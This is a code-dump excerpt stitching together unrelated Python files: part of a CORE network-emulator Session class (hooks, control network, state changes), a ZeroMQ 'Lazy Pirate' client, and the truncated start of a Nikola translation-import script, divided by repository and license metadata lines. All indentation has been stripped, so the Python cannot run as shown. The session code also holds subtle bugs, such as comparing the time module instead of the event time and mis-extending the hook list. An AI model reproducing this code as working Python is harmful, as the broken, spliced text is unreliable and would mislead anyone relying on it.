self.setstate(state=coreapi.CORE_EVENT_DEFINITION_STATE,
info=False, sendevent=False)
# dict of configuration items from /etc/core/core.conf config file
self.cfg = cfg
self.server = server
if not persistent:
self.addsession(self)
self.master = False
self.broker = CoreBroker(session=self, verbose=self.verbose)
self.location = CoreLocation(self)
self.mobility = MobilityManager(self)
self.netidmanager = NetIDSubnetMapManager(self)
self.services = CoreServices(self)
self.emane = emane.Emane(self)
self.xen = xenconfig.XenConfigManager(self)
self.sdt = Sdt(self)
# future parameters set by the GUI may go here
self.options = SessionConfig(self)
self.metadata = SessionMetaData(self)
@classmethod
def addsession(cls, session):
cls.__sessions.add(session)
@classmethod
def delsession(cls, session):
try:
cls.__sessions.remove(session)
except KeyError:
pass
@classmethod
def atexit(cls):
while cls.__sessions:
s = cls.__sessions.pop()
if cls.verbose:
print(("WARNING: automatically shutting down " \
"non-persistent session %s" % s.sessionid), file = sys.stderr)
s.shutdown()
def __del__(self):
# note: there is no guarantee this will ever run
self.shutdown()
def shutdown(self):
''' Shut down all emulation objects and remove the session directory.
'''
self.emane.shutdown()
self.broker.shutdown()
self.sdt.shutdown()
self.delobjs()
self.netidmanager.clear()
preserve = False
if hasattr(self.options, 'preservedir'):
if self.options.preservedir == '1':
preserve = True
if not preserve:
shutil.rmtree(self.sessiondir, ignore_errors = True)
if self.server:
self.server.delsession(self)
self.delsession(self)
def isconnected(self):
''' Returns true if this session has a request handler.
'''
with self._handlerslock:
if len(self._handlers) == 0:
return False
else:
return True
def connect(self, handler):
''' Set the request handler for this session, making it connected.
'''
# the master flag will only be set after a GUI has connected with the
# handler, e.g. not during normal startup
if handler.master is True:
self.master = True
with self._handlerslock:
self._handlers.add(handler)
def disconnect(self, handler):
''' Disconnect a request handler from this session. Shutdown this
session if there is no running emulation.
'''
with self._handlerslock:
try:
self._handlers.remove(handler)
except KeyError:
raise ValueError("Handler %s not associated with this session" % handler)
num_handlers = len(self._handlers)
if num_handlers == 0:
# shut down this session unless we are instantiating, running,
# or collecting final data
if self.getstate() < coreapi.CORE_EVENT_INSTANTIATION_STATE or \
self.getstate() > coreapi.CORE_EVENT_DATACOLLECT_STATE:
self.shutdown()
def broadcast(self, src, msg):
''' Send Node and Link CORE API messages to all handlers connected to this session.
'''
self._handlerslock.acquire()
for handler in self._handlers:
if handler == src:
continue
if isinstance(msg, coreapi.CoreNodeMessage) or \
isinstance(msg, coreapi.CoreLinkMessage):
try:
handler.sendall(msg.rawmsg)
except Exception as e:
self.warn("sendall() error: %s" % e)
self._handlerslock.release()
def broadcastraw(self, src, data):
''' Broadcast raw data to all handlers except src.
'''
self._handlerslock.acquire()
for handler in self._handlers:
if handler == src:
continue
try:
handler.sendall(data)
except Exception as e:
self.warn("sendall() error: %s" % e)
self._handlerslock.release()
def gethandler(self):
''' Get one of the connected handlers, preferrably the master.
'''
with self._handlerslock:
if len(self._handlers) == 0:
return None
for handler in self._handlers:
if handler.master:
return handler
for handler in self._handlers:
return handler
def setstate(self, state, info = False, sendevent = False,
returnevent = False):
''' Set the session state. When info is true, log the state change
event using the session handler's info method. When sendevent is
true, generate a CORE API Event Message and send to the connected
entity.
'''
self._time = time.time()
self._state = state
replies = []
if self.isconnected() and info:
statename = coreapi.state_name(state)
with self._handlerslock:
for handler in self._handlers:
handler.info("SESSION %s STATE %d: %s at %s" % \
(self.sessionid, state, statename,
time.ctime()))
self.writestate(state)
self.runhook(state)
if self.isconnected() and sendevent:
tlvdata = b""
tlvdata += coreapi.CoreEventTlv.pack(coreapi.CORE_TLV_EVENT_TYPE,
state)
msg = coreapi.CoreEventMessage.pack(0, tlvdata)
# send Event Message to connected handlers (e.g. GUI)
try:
if returnevent:
replies.append(msg)
else:
self.broadcastraw(None, msg)
except Exception as e:
self.warn("Error sending Event Message: %s" % e)
# also inform slave servers
tmp = self.broker.handlerawmsg(msg)
return replies
def getstate(self):
''' Retrieve the current state of the session.
'''
return self._state
def writestate(self, state):
''' Write the current state to a state file in the session dir.
'''
try:
f = open(os.path.join(self.sessiondir, "state"), "w")
f.write("%d %s\n" % (state, coreapi.state_name(state)))
f.close()
except Exception as e:
self.warn("Error writing state file: %s" % e)
def runhook(self, state, hooks=None):
''' Run hook scripts upon changing states.
If hooks is not specified, run all hooks in the given state.
'''
if state not in self._hooks:
return
if hooks is None:
hooks = self._hooks[state]
for (filename, data) in hooks:
try:
f = open(os.path.join(self.sessiondir, filename), "w")
f.write(data)
f.close()
except Exception as e:
self.warn("Error writing hook '%s': %s" % (filename, e))
self.info("Running hook %s for state %s" % (filename, state))
try:
check_call(["/bin/sh", filename], cwd=self.sessiondir,
env=self.getenviron())
except Exception as e:
self.warn("Error running hook '%s' for state %s: %s" %
(filename, state, e))
def sethook(self, type, filename, srcname, data):
''' Store a hook from a received File Message.
'''
if srcname is not None:
raise NotImplementedError
(hookid, state) = type.split(':')[:2]
if not state.isdigit():
self.warn("Error setting hook having state '%s'" % state)
return
state = int(state)
hook = (filename, data)
if state not in self._hooks:
self._hooks[state] = [hook,]
else:
self._hooks[state] += hook
# immediately run a hook if it is in the current state
# (this allows hooks in the definition and configuration states)
if self.getstate() == state:
self.runhook(state, hooks = [hook,])
def delhooks(self):
''' Clear the hook scripts dict.
'''
self._hooks = {}
def getenviron(self, state=True):
''' Get an environment suitable for a subprocess.Popen call.
This is the current process environment with some session-specific
variables.
'''
env = os.environ.copy()
env['SESSION'] = "%s" % self.sessionid
env['SESSION_DIR'] = "%s" % self.sessiondir
env['SESSION_NAME'] = "%s" % self.name
env['SESSION_FILENAME'] = "%s" % self.filename
env['SESSION_USER'] = "%s" % self.user
env['SESSION_NODE_COUNT'] = "%s" % self.node_count
if state:
env['SESSION_STATE'] = "%s" % self.getstate()
try:
readfileintodict(os.path.join(CORE_CONF_DIR, "environment"), env)
except IOError:
pass
if self.user:
try:
readfileintodict(os.path.join('/home', self.user, ".core",
"environment"), env)
except IOError:
pass
return env
def setthumbnail(self, thumbfile):
''' Set the thumbnail filename. Move files from /tmp to session dir.
'''
if not os.path.exists(thumbfile):
self.thumbnail = None
return
dstfile = os.path.join(self.sessiondir, os.path.basename(thumbfile))
shutil.move(thumbfile, dstfile)
#print "thumbnail: %s -> %s" % (thumbfile, dstfile)
self.thumbnail = dstfile
def setuser(self, user):
''' Set the username for this session. Update the permissions of the
session dir to allow the user write access.
'''
if user is not None:
try:
uid = pwd.getpwnam(user).pw_uid
gid = os.stat(self.sessiondir).st_gid
os.chown(self.sessiondir, uid, gid)
except Exception as e:
self.warn("Failed to set permission on %s: %s" % (self.sessiondir, e))
self.user = user
def objs(self):
''' Return iterator over the emulation object dictionary.
'''
return iter(list(self._objs.values()))
def getobjid(self):
''' Return a unique, random object id.
'''
self._objslock.acquire()
while True:
id = random.randint(1, 0xFFFF)
if id not in self._objs:
break
self._objslock.release()
return id
def addobj(self, cls, *clsargs, **clskwds):
''' Add an emulation object.
'''
obj = cls(self, *clsargs, **clskwds)
self._objslock.acquire()
if obj.objid in self._objs:
self._objslock.release()
obj.shutdown()
raise KeyError("non-unique object id %s for %s" % (obj.objid, obj))
self._objs[obj.objid] = obj
self._objslock.release()
return obj
def obj(self, objid):
''' Get an emulation object.
'''
if objid not in self._objs:
raise KeyError("unknown object id %s" % (objid))
return self._objs[objid]
def objbyname(self, name):
''' Get an emulation object using its name attribute.
'''
with self._objslock:
for obj in self.objs():
if hasattr(obj, "name") and obj.name == name:
return obj
raise KeyError("unknown object with name %s" % (name))
def delobj(self, objid):
''' Remove an emulation object.
'''
self._objslock.acquire()
try:
o = self._objs.pop(objid)
except KeyError:
o = None
self._objslock.release()
if o:
o.shutdown()
del o
gc.collect()
# print "gc count:", gc.get_count()
# for o in gc.get_objects():
# if isinstance(o, PyCoreObj):
# print "XXX XXX XXX PyCoreObj:", o
# for r in gc.get_referrers(o):
# print "XXX XXX XXX referrer:", gc.get_referrers(o)
def delobjs(self):
''' Clear the _objs dictionary, and call each obj.shutdown() routine.
'''
self._objslock.acquire()
while self._objs:
k, o = self._objs.popitem()
o.shutdown()
self._objslock.release()
def writeobjs(self):
''' Write objects to a 'nodes' file in the session dir.
The 'nodes' file lists:
number, name, api-type, class-type
'''
try:
f = open(os.path.join(self.sessiondir, "nodes"), "w")
with self._objslock:
for objid in sorted(self._objs.keys()):
o = self._objs[objid]
f.write("%s %s %s %s\n" % (objid, o.name, o.apitype, type(o)))
f.close()
except Exception as e:
self.warn("Error writing nodes file: %s" % e)
def addconfobj(self, objname, type, callback):
''' Objects can register configuration objects that are included in
the Register Message and may be configured via the Configure
Message. The callback is invoked when receiving a Configure Message.
'''
if type not in coreapi.reg_tlvs:
raise Exception("invalid configuration object type")
self._confobjslock.acquire()
self._confobjs[objname] = (type, callback)
self._confobjslock.release()
def confobj(self, objname, session, msg):
''' Invoke the callback for an object upon receipt of a Configure
Message for that object. A no-op if the object doesn't exist.
'''
replies = []
self._confobjslock.acquire()
if objname == "all":
for objname in self._confobjs:
(type, callback) = self._confobjs[objname]
reply = callback(session, msg)
if reply is not None:
replies.append(reply)
self._confobjslock.release()
return replies
if objname in self._confobjs:
(type, callback) = self._confobjs[objname]
self._confobjslock.release()
reply = callback(session, msg)
if reply is not None:
replies.append(reply)
return replies
else:
self.info("session object doesn't own model '%s', ignoring" % \
objname)
self._confobjslock.release()
return replies
def confobjs_to_tlvs(self):
''' Turn the configuration objects into a list of Register Message TLVs.
'''
tlvdata = b""
self._confobjslock.acquire()
for objname in self._confobjs:
(type, callback) = self._confobjs[objname]
# type must be in coreapi.reg_tlvs
tlvdata += coreapi.CoreRegTlv.pack(type, objname)
self._confobjslock.release()
return tlvdata
def info(self, msg):
''' Utility method for writing output to stdout.
'''
if hasattr(self.options, 'clientlogfile'):
fname = self.options.clientlogfile
with open(fname, 'a') as logfile:
print(msg, file = logfile, flush = True)
else:
print(msg, file = sys.stdout, flush = True)
sys.stdout.flush()
def warn(self, msg):
''' Utility method for writing output to stderr.
'''
if hasattr(self.options, 'clientlogfile'):
fname = self.options.clientlogfile
with open(fname, 'a') as logfile:
print(msg, file = logfile, flush = True)
else:
print(msg, file = sys.stderr, flush = True)
sys.stderr.flush()
def dumpsession(self):
''' Debug print this session.
'''
self.info("session id=%s name=%s state=%s connected=%s" % \
(self.sessionid, self.name, self._state, self.isconnected()))
num = len(self._objs)
self.info(" file=%s thumb=%s nc=%s/%s" % \
(self.filename, self.thumbnail, self.node_count, num))
def exception(self, level, source, objid, text):
''' Generate an Exception Message
'''
vals = (objid, str(self.sessionid), level, source, time.ctime(), text)
types = ("NODE", "SESSION", "LEVEL", "SOURCE", "DATE", "TEXT")
tlvdata = b''
for (t,v) in zip(types, vals):
if v is not None:
tlvdata += coreapi.CoreExceptionTlv.pack(
eval("coreapi.CORE_TLV_EXCP_%s" % t), v)
msg = coreapi.CoreExceptionMessage.pack(0, tlvdata)
self.warn("exception: %s (%s) %s" % (source, objid, text))
# send Exception Message to connected handlers (e.g. GUI)
self.broadcastraw(None, msg)
def getcfgitem(self, cfgname):
''' Return an entry from the configuration dictionary that comes from
command-line arguments and/or the core.conf config file.
'''
if cfgname not in self.cfg:
return None
else:
return self.cfg[cfgname]
def getcfgitembool(self, cfgname, defaultifnone = None):
''' Return a boolean entry from the configuration dictionary, may
return None if undefined.
'''
item = self.getcfgitem(cfgname)
if item is None:
return defaultifnone
return bool(item.lower() == "true")
def getcfgitemint(self, cfgname, defaultifnone = None):
''' Return an integer entry from the configuration dictionary, may
return None if undefined.
'''
item = self.getcfgitem(cfgname)
if item is None:
return defaultifnone
return int(item)
def instantiate(self, handler=None):
''' We have entered the instantiation state, invoke startup methods
of various managers and boot the nodes. Validate nodes and check
for transition to the runtime state.
'''
self.writeobjs()
# controlnet may be needed by some EMANE models
self.addremovectrlif(node=None, remove=False)
if self.emane.startup() == self.emane.NOT_READY:
return # instantiate() will be invoked again upon Emane.configure()
self.broker.startup()
self.mobility.startup()
# boot the services on each node
self.bootnodes(handler)
# allow time for processes to start
time.sleep(0.125)
self.validatenodes()
self.emane.poststartup()
# assume either all nodes have booted already, or there are some
# nodes on slave servers that will be booted and those servers will
# send a node status response message
self.checkruntime()
def getnodecount(self):
''' Returns the number of CoreNodes and CoreNets, except for those
that are not considered in the GUI's node count.
'''
with self._objslock:
count = len([x for x in self.objs() if not isinstance(x, (nodes.PtpNet, nodes.CtrlNet))])
# on Linux, GreTapBridges are auto-created, not part of
# GUI's node count
if 'GreTapBridge' in globals():
count -= len([x for x in self.objs() if isinstance(x, GreTapBridge) and not \
isinstance(x, nodes.TunnelNode)])
return count
def checkruntime(self):
''' Check if we have entered the runtime state, that all nodes have been
started and the emulation is running. Start the event loop once we
have entered runtime (time=0).
'''
# this is called from instantiate() after receiving an event message
# for the instantiation state, and from the broker when distributed
# nodes have been started
if self.node_count is None:
return
if self.getstate() == coreapi.CORE_EVENT_RUNTIME_STATE:
return
session_node_count = int(self.node_count)
nc = self.getnodecount()
# count booted nodes not emulated on this server
# TODO: let slave server determine RUNTIME and wait for Event Message
# broker.getbootocunt() counts all CoreNodes from status reponse
# messages, plus any remote WLANs; remote EMANE, hub, switch, etc.
# are already counted in self._objs
nc += self.broker.getbootcount()
self.info("Checking for runtime with %d of %d session nodes" % \
(nc, session_node_count))
if nc < session_node_count:
return # do not have information on all nodes yet
# information on all nodes has been received and they have been started
# enter the runtime state
# TODO: more sophisticated checks to verify that all nodes and networks
# are running
state = coreapi.CORE_EVENT_RUNTIME_STATE
self.evq.run()
self.setstate(state, info=True, sendevent=True)
def datacollect(self):
''' Tear down a running session. Stop the event loop and any running
nodes, and perform clean-up.
'''
self.evq.stop()
with self._objslock:
for obj in self.objs():
if isinstance(obj, nodes.PyCoreNode):
self.services.stopnodeservices(obj)
self.emane.shutdown()
self.updatectrlifhosts(remove=True)
self.addremovectrlif(node=None, remove=True)
# self.checkshutdown() is currently invoked from node delete handler
def checkshutdown(self):
''' Check if we have entered the shutdown state, when no running nodes
and links remain.
'''
with self._objslock:
nc = len(self._objs)
# TODO: this doesn't consider slave server node counts
# wait for slave servers to enter SHUTDOWN state, then master session
# can enter SHUTDOWN
replies = ()
if nc == 0:
replies = self.setstate(state=coreapi.CORE_EVENT_SHUTDOWN_STATE,
info=True, sendevent=True, returnevent=True)
self.sdt.shutdown()
return replies
def setmaster(self, handler):
''' Look for the specified handler and set our master flag
appropriately. Returns True if we are connected to the given
handler.
'''
with self._handlerslock:
for h in self._handlers:
if h != handler:
continue
self.master = h.master
return True
return False
def shortsessionid(self):
''' Return a shorter version of the session ID, appropriate for
interface names, where length may be limited.
'''
return (self.sessionid >> 8) ^ (self.sessionid & ((1 << 8) - 1))
def bootnodes(self, handler):
''' Invoke the boot() procedure for all nodes and send back node
messages to the GUI for node messages that had the status
request flag.
'''
#self.addremovectrlif(node=None, remove=False)
with self._objslock:
for n in self.objs():
if not isinstance(n, nodes.PyCoreNode):
continue
if isinstance(n, nodes.RJ45Node):
continue
# add a control interface if configured
self.addremovectrlif(node=n, remove=False)
n.boot()
nodenum = n.objid
if handler is None:
continue
if nodenum in handler.nodestatusreq:
tlvdata = b""
tlvdata += coreapi.CoreNodeTlv.pack(coreapi.CORE_TLV_NODE_NUMBER,
nodenum)
tlvdata += coreapi.CoreNodeTlv.pack(coreapi.CORE_TLV_NODE_EMUID,
n.objid)
reply = coreapi.CoreNodeMessage.pack(coreapi.CORE_API_ADD_FLAG \
| coreapi.CORE_API_LOC_FLAG,
tlvdata)
try:
handler.request.sendall(reply)
except Exception as e:
self.warn("sendall() error: %s" % e)
del handler.nodestatusreq[nodenum]
self.updatectrlifhosts()
def validatenodes(self):
with self._objslock:
for n in self.objs():
# TODO: this can be extended to validate everything
# such as vnoded process, bridges, etc.
if not isinstance(n, nodes.PyCoreNode):
continue
if isinstance(n, nodes.RJ45Node):
continue
n.validate()
def addremovectrlnet(self, remove=False):
''' Create a control network bridge as necessary.
When the remove flag is True, remove the bridge that connects control
interfaces.
'''
prefix = None
try:
if self.cfg['controlnet']:
prefix = self.cfg['controlnet']
except KeyError:
pass
if hasattr(self.options, 'controlnet'):
prefix = self.options.controlnet
if not prefix:
return None # no controlnet needed
# return any existing controlnet bridge
id = "ctrlnet"
try:
ctrlnet = self.obj(id)
if remove:
self.delobj(ctrlnet.objid)
return None
return ctrlnet
except KeyError:
if remove:
return None
# build a new controlnet bridge
updown_script = None
try:
if self.cfg['controlnet_updown_script']:
updown_script = self.cfg['controlnet_updown_script']
except KeyError:
pass
prefixes = prefix.split()
if len(prefixes) > 1:
assign_address = True
if self.master:
try:
prefix = prefixes[0].split(':', 1)[1]
except IndexError:
prefix = prefixes[0] # possibly only one server
else:
# slave servers have their name and localhost in the serverlist
servers = self.broker.getserverlist()
servers.remove('localhost')
prefix = None
for server_prefix in prefixes:
server, p = server_prefix.split(':')
if server == servers[0]:
prefix = p
break
if not prefix:
msg = "Control network prefix not found for server '%s'" % \
servers[0]
self.exception(coreapi.CORE_EXCP_LEVEL_ERROR,
"Session.addremovectrlnet()", None, msg)
prefix = prefixes[0].split(':', 1)[1]
assign_address = False
else:
# with one prefix, only master gets a ctrlnet address
assign_address = self.master
ctrlnet = self.addobj(cls=nodes.CtrlNet, objid=id, prefix=prefix,
assign_address=assign_address,
updown_script=updown_script)
# tunnels between controlnets will be built with Broker.addnettunnels()
self.broker.addnet(id)
for server in self.broker.getserverlist():
self.broker.addnodemap(server, id)
return ctrlnet
def addremovectrlif(self, node, remove=False):
''' Add a control interface to a node when a 'controlnet' prefix is
listed in the config file or session options. Uses
addremovectrlnet() to build or remove the control bridge.
'''
ctrlnet = self.addremovectrlnet(remove)
if ctrlnet is None:
return
if node is None:
return
ctrlip = node.objid
try:
addrlist = ["%s/%s" % (ctrlnet.prefix.addr(ctrlip),
ctrlnet.prefix.prefixlen)]
except ValueError:
msg = "Control interface not added to node %s. " % node.objid
msg += "Invalid control network prefix (%s). " % ctrlnet.prefix
msg += "A longer prefix length may be required for this many nodes."
node.exception(coreapi.CORE_EXCP_LEVEL_ERROR,
"Session.addremovectrlif()", msg)
return
ifi = node.newnetif(net = ctrlnet, ifindex = ctrlnet.CTRLIF_IDX_BASE,
ifname = "ctrl0", hwaddr = MacAddr.random(),
addrlist = addrlist)
node.netif(ifi).control = True
def updatectrlifhosts(self, remove=False):
''' Add the IP addresses of control interfaces to the /etc/hosts file.
'''
if not self.getcfgitembool('update_etc_hosts', False):
return
id = "ctrlnet"
try:
ctrlnet = self.obj(id)
except KeyError:
return
header = "CORE session %s host entries" % self.sessionid
if remove:
if self.getcfgitembool('verbose', False):
self.info("Removing /etc/hosts file entries.")
filedemunge('/etc/hosts', header)
return
entries = []
for ifc in ctrlnet.netifs():
name = ifc.node.name
for addr in ifc.addrlist:
entries.append("%s %s" % (addr.split('/')[0], ifc.node.name))
if self.getcfgitembool('verbose', False):
self.info("Adding %d /etc/hosts file entries." % len(entries))
filemunge('/etc/hosts', header, '\n'.join(entries) + '\n')
def runtime(self):
''' Return the current time we have been in the runtime state, or zero
if not in runtime.
'''
if self.getstate() == coreapi.CORE_EVENT_RUNTIME_STATE:
return time.time() - self._time
else:
return 0.0
def addevent(self, etime, node=None, name=None, data=None):
''' Add an event to the event queue, with a start time relative to the
start of the runtime state.
'''
etime = float(etime)
runtime = self.runtime()
if runtime > 0.0:
if time <= runtime:
self.warn("Could not schedule past event for time %s " \
"(run time is now %s)" % (time, runtime))
return
etime = etime - runtime
func = self.runevent
self.evq.add_event(etime, func, node=node, name=name, data=data)
if name is None:
name = ""
self.info("scheduled event %s at time %s data=%s" % \
(name, etime + runtime, data))
def runevent(self, node=None, name=None, data=None):
''' Run a scheduled event, executing commands in the data string.
'''
now = self.runtime()
if name is None:
name = ""
self.info("running event %s at time %s cmd=%s" % (name, now, data))
if node is None:
mutedetach(shlex.split(data))
else:
n = self.obj(node)
n.cmd(shlex.split(data), wait=False)
def sendobjs(self):
''' Return API messages that describe the current session.
'''
replies = []
nn = 0
ni = 0
# send NetIDSubnetMap
msgs = self.netidmanager.toconfmsgs(flags=0, nodenum=-1,
typeflags=coreapi.CONF_TYPE_FLAGS_UPDATE)
replies.extend(msgs)
# send node messages for node and network objects
with self._objslock:
for obj in self.objs():
created_nodemsg = False
msg = obj.tonodemsg(flags = coreapi.CORE_API_ADD_FLAG)
if msg is not None:
created_nodemsg = True
replies.append(msg)
nn += 1
# send interface messages from interface objects
# if obj has tonodemsg(), the it's a node and thus contains
# interfaces. we will now iterate over those interface and push
# one API message each.
if created_nodemsg:
for ifindex, interface in list(obj._netif.items()):
msg = interface.tointerfacemsg(flags = coreapi.CORE_API_ADD_FLAG)
if msg is not None:
replies.append(msg)
ni += 1
nl = 0
# send link messages from net objects
with self._objslock:
for obj in self.objs():
linkmsgs = obj.tolinkmsgs(flags = coreapi.CORE_API_ADD_FLAG)
for msg in linkmsgs:
replies.append(msg)
nl += 1
# send model info
configs = self.mobility.getallconfigs()
configs += self.emane.getallconfigs()
for (nodenum, cls, values) in configs:
#cls = self.mobility._modelclsmap[conftype]
msg = cls.toconfmsg(flags=0, nodenum=nodenum,
typeflags=coreapi.CONF_TYPE_FLAGS_UPDATE,
values=values)
replies.append(msg)
# service customizations
svc_configs = self.services.getallconfigs()
for (nodenum, svc) in svc_configs:
opaque = "service:%s" % svc._name
tlvdata = b""
tlvdata += coreapi.CoreConfTlv.pack(coreapi.CORE_TLV_CONF_NODE,
nodenum)
tlvdata += coreapi.CoreConfTlv.pack(coreapi.CORE_TLV_CONF_OPAQUE,
opaque)
tmp = coreapi.CoreConfMessage(flags=0, hdr=b"", data=tlvdata)
replies.append(self.services.configure_request(tmp))
for (filename, data) in self.services.getallfiles(svc):
flags = coreapi.CORE_API_ADD_FLAG
tlvdata = coreapi.CoreFileTlv.pack(coreapi.CORE_TLV_FILE_NODE,
nodenum)
tlvdata += coreapi.CoreFileTlv.pack(coreapi.CORE_TLV_FILE_NAME,
str(filename))
tlvdata += coreapi.CoreFileTlv.pack(coreapi.CORE_TLV_FILE_TYPE,
opaque)
tlvdata += coreapi.CoreFileTlv.pack(coreapi.CORE_TLV_FILE_DATA,
str(data))
replies.append(coreapi.CoreFileMessage.pack(flags, tlvdata))
# TODO: send location info
# replies.append(self.location.toconfmsg())
# send hook scripts
for state in sorted(self._hooks.keys()):
for (filename, data) in self._hooks[state]:
flags = coreapi.CORE_API_ADD_FLAG
tlvdata = coreapi.CoreFileTlv.pack(coreapi.CORE_TLV_FILE_NAME,
str(filename))
tlvdata += coreapi.CoreFileTlv.pack(coreapi.CORE_TLV_FILE_TYPE,
"hook:%s" % state)
tlvdata += coreapi.CoreFileTlv.pack(coreapi.CORE_TLV_FILE_DATA,
str(data))
replies.append(coreapi.CoreFileMessage.pack(flags, tlvdata))
# send meta data
tmp = coreapi.CoreConfMessage(flags=0, hdr=b"", data=b"")
opts = self.options.configure_request(tmp,
typeflags = coreapi.CONF_TYPE_FLAGS_UPDATE)
if opts:
replies.append(opts)
meta = self.metadata.configure_request(tmp,
typeflags = coreapi.CONF_TYPE_FLAGS_UPDATE)
if meta:
replies.append(meta)
self.info("informing GUI about %d nodes, %d interfaces and %d links" % (nn, ni, nl))
return replies
class SessionConfig(ConfigurableManager, Configurable):
_name = 'session'
_type = coreapi.CORE_TLV_REG_UTILITY
_confmatrix = [
("controlnet", coreapi.CONF_DATA_TYPE_STRING, '', '',
'Control network'),
("enablerj45", coreapi.CONF_DATA_TYPE_BOOL, '1', 'On,Off',
'Enable RJ45s'),
("preservedir", coreapi.CONF_DATA_TYPE_BOOL, '0', 'On,Off',
'Preserve session dir'),
("enablesdt", coreapi.CONF_DATA_TYPE_BOOL, '0', 'On,Off',
'Enable SDT3D output'),
("enableipv4", coreapi.CONF_DATA_TYPE_BOOL, '1', 'On,Off',
'Enable IPv4'),
("enableipv6", coreapi.CONF_DATA_TYPE_BOOL, '1', 'On,Off',
'Enable IPv6'),
]
_confgroups = "Options:1-%d" % len(_confmatrix)
def __init__(self, session):
ConfigurableManager.__init__(self, session)
session.broker.handlers += (self.handledistributed, )
self.reset()
def reset(self):
defaults = self.getdefaultvalues()
for k in self.getnames():
# value may come from config file
v = self.session.getcfgitem(k)
if v is None:
v = self.valueof(k, defaults)
v = self.offontobool(v)
setattr(self, k, v)
def configure_values(self, msg, values):
return self.configure_values_keyvalues(msg, values, self,
self.getnames())
def configure_request(self, msg, typeflags = coreapi.CONF_TYPE_FLAGS_NONE):
nodenum = msg.gettlv(coreapi.CORE_TLV_CONF_NODE)
values = []
for k in self.getnames():
v = getattr(self, k)
if v is None:
v = ""
values.append("%s" % v)
return self.toconfmsg(0, nodenum, typeflags, values)
def handledistributed(self, msg):
''' Handle the session options config message as it has reached the
broker. Options requiring modification for distributed operation should
be handled here.
'''
if not self.session.master:
return
if msg.msgtype != coreapi.CORE_API_CONF_MSG or \
msg.gettlv(coreapi.CORE_TLV_CONF_OBJ) != "session":
return
values_str = msg.gettlv(coreapi.CORE_TLV_CONF_VALUES)
if values_str is None:
return
values = values_str.split('|')
if not self.haskeyvalues(values):
return
for v in values:
key, value = v.split('=', 1)
if key == "controlnet":
self.handledistributedcontrolnet(msg, values, values.index(v))
def handledistributedcontrolnet(self, msg, values, idx):
''' Modify Config Message if multiple control network prefixes are
defined. Map server names to prefixes and repack the message before
it is forwarded to slave servers.
'''
kv = values[idx]
key, value = kv.split('=', 1)
controlnets = value.split()
if len(controlnets) < 2:
return # multiple controlnet prefixes do not exist
servers = self.session.broker.getserverlist()
if len(servers) < 2:
return # not distributed
servers.remove("localhost")
servers.insert(0, "localhost") # master always gets first prefix
# create list of "server1:ctrlnet1 server2:ctrlnet2 ..."
controlnets = ["%s:%s" % (x[0],x[1]) for x in zip(servers, controlnets)]
values[idx] = "controlnet=%s" % (' '.join(controlnets))
values_str = '|'.join(values)
msg.tlvdata[coreapi.CORE_TLV_CONF_VALUES] = values_str
msg.repack()
class SessionMetaData(ConfigurableManager):
''' Metadata is simply stored in a configs[] dict. Key=value pairs are
passed in from configure messages destined to the "metadata" object.
The data is not otherwise interpreted or processed.
'''
_name = "metadata"
_type = coreapi.CORE_TLV_REG_UTILITY
def configure_values(self, msg, values):
if values is None:
return None
kvs = values.split('|')
for kv in kvs:
try:
(key, value) = kv.split('=', 1)
except ValueError:
raise ValueError("invalid key in metdata: %s" % kv)
self.additem(key, value)
return None
def configure_request(self, msg, typeflags = coreapi.CONF_TYPE_FLAGS_NONE):
nodenum = msg.gettlv(coreapi.CORE_TLV_CONF_NODE)
values_str = "|".join(["%s=%s" % (k_v[0],k_v[1]) for k_v in list(self.items())])
return self.toconfmsg(0, nodenum, typeflags, values_str)
def toconfmsg(self, flags, nodenum, typeflags, values_str):
tlvdata = b""
if nodenum is not None:
tlvdata += coreapi.CoreConfTlv.pack(coreapi.CORE_TLV_CONF_NODE,
nodenum)
tlvdata += coreapi.CoreConfTlv.pack(coreapi.CORE_TLV_CONF_OBJ,
self._name)
tlvdata += coreapi.CoreConfTlv.pack(coreapi.CORE_TLV_CONF_TYPE,
typeflags)
datatypes = tuple( [coreapi.CONF_DATA_TYPE_STRING for k_v1 in list(self.items())] )
tlvdata += coreapi.CoreConfTlv.pack(coreapi.CORE_TLV_CONF_DATA_TYPES,
datatypes)
tlvdata += coreapi.CoreConfTlv.pack(coreapi.CORE_TLV_CONF_VALUES,
values_str)
msg = coreapi.CoreConfMessage.pack(flags, tlvdata)
return msg
def additem(self, key, value):
self.configs[key] = value
def items(self):
return iter(list(self.configs.items()))
atexit.register(Session.atexit)
| bsd-3-clause |
davruet/shenanigans.io | experiments/zmq_server/client.py | 1 | 1866 | #!/opt/local/bin/python3.4
#
# Lazy Pirate client
# Use zmq_poll to do a safe request-reply
# To run, start lpserver and then randomly kill/restart it
#
# Author: Daniel Lundin <dln(at)eintr(dot)org>
#
import sys
import zmq
REQUEST_TIMEOUT = 2500
REQUEST_RETRIES = 3
SERVER_ENDPOINT = "tcp://localhost:5555"
context = zmq.Context(1)
print ("I: Connecting to server…")
client = context.socket(zmq.REQ)
client.connect(SERVER_ENDPOINT)
poll = zmq.Poller()
poll.register(client, zmq.POLLIN)
sequence = 0
retries_left = REQUEST_RETRIES
while retries_left:
sequence += 1
request = str(sequence)
print ("I: Sending (%s)" % request)
client.send_string(request)
expect_reply = True
while expect_reply:
socks = dict(poll.poll(REQUEST_TIMEOUT))
if socks.get(client) == zmq.POLLIN:
reply = client.recv()
if not reply:
break
if int(reply) == sequence:
print ("I: Server replied OK (%s)" % reply)
retries_left = REQUEST_RETRIES
expect_reply = False
else:
print ("E: Malformed reply from server: %s" % reply)
else:
print ("W: No response from server, retrying…")
# Socket is confused. Close and remove it.
client.setsockopt(zmq.LINGER, 0)
client.close()
poll.unregister(client)
retries_left -= 1
if retries_left == 0:
print ("E: Server seems to be offline, abandoning")
break
print ("I: Reconnecting and resending (%s)" % request)
# Create new connection
client = context.socket(zmq.REQ)
client.connect(SERVER_ENDPOINT)
poll.register(client, zmq.POLLIN)
client.send_string(request)
context.term()
| agpl-3.0 |
s2hc-johan/nikola | scripts/import_po.py | 8 | 1061 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Download translations from transifex and regenerate files."""
from __future__ import unicode_literals, print_function
import io
from glob import glob
import os
import sys
import polib
if 'nopull' not in sys.argv:
os.system("tx pull -a")
trans_files = glob(os.path.join('translations', 'nikola.messages', '*.po'))
for fname in trans_files:
lang = os.path.splitext(os.path.basename(fname))[0].lower()
lang = lang.replace('@', '_')
outf = os.path.join('nikola', 'data', 'themes', 'base',
'messages', 'messages_{0}.py'.format(lang))
po = polib.pofile(fname)
lines = """# -*- encoding:utf-8 -*-
from __future__ import unicode_literals
MESSAGES = {""".splitlines()
lines2 = []
